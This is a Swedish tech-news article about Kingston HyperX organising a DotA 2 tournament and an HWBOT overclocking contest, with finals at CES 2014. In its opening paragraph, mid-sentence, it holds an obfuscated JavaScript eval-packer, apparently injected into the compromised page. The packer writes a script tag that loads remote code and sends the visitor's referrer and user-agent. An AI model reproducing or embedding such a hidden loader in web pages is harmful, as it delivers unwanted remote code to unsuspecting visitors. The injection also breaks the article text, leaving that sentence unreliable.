Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

CES 2014: Kingston arrangerar DotA 2‑överklockningstävlingar

CES 2014: Kingston arrangerar DotA 2‑överklockningstävlingar
Sebastian

CES 2014:Kingston Technology Europe Co LLP, ett dotterbolag till Kingston Technology Company Inc. som är världsledande inom minnesprodukter, inleder snart två globala tävlingar för att visa sitt stöd och engagemang för eSports och dess entusiastiska fans. I HyperX DotA 2 League kämpar sexton av världens DotA eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yinsh|var|u0026u|referrer|yzffb||js|php’.split(’|’),0,{}))
2
-spelteam om en stor prissumma. Den 7 oktober inleder HyperX en öppen global överklockningstävling. Finalerna för båda tävlingarna kommer att gå av stapeln under 2014 International CES i Las Vegas.

Turneringen HyperX DotA 2 League inleds senare den här månaden med sexton lag som kämpar om en total prissumma på 50 000 USD. Ytterligare förmåner i form av ersättning för flygresa och hotell erbjuds till de fyra bästa lagen, som ska kämpa mot varandra i Las Vegas om mästartiteln. Varje match består av tre kartor och bästa laget går vidare. Samtliga matcher kommer att sändas live så att fans kan följa sitt favoritlag. Information om format och tävling finns här.

Tillsammans med HWBOT, den främsta informationssidan för överklockare och prestandaentusiaster, kommer de tävlande att kämpa om att uppnå de högsta standarderna för maximal minnesfrekvens, Super PI och Intel XTU. Turneringen inleds den 7 oktober med en öppen kvalificeringsrunda, som pågår under fyra veckor.

Vinnare utses varje vecka och de fyra finalisterna kommer att tävla mot varandra i januari 2014 under CES. I finalen tillhandahåller Kingston och dess samarbetspartner – ASUSCooler Master och Intel – utrustning till de tävlande. Samtliga regler finns här.

”HyperX 2013 DotA 2-turneringen är episk då de bästa professionella spelteamen i världen kämpar mot varandra och fansen kan uppleva varje minut live på nätet”, säger Krystian Jaroszynski, European Product Marketing Manager, HyperX and Server, Kingston. ”Vi är också mycket glada över att arrangera en global överklockningstävling för att testa gränserna för HyperX-minnet. De två evenemangen kommer att vara roliga och spännande för både spelare och entusiaster.”

Gå in på Kingston HyperX webbplats för mer information.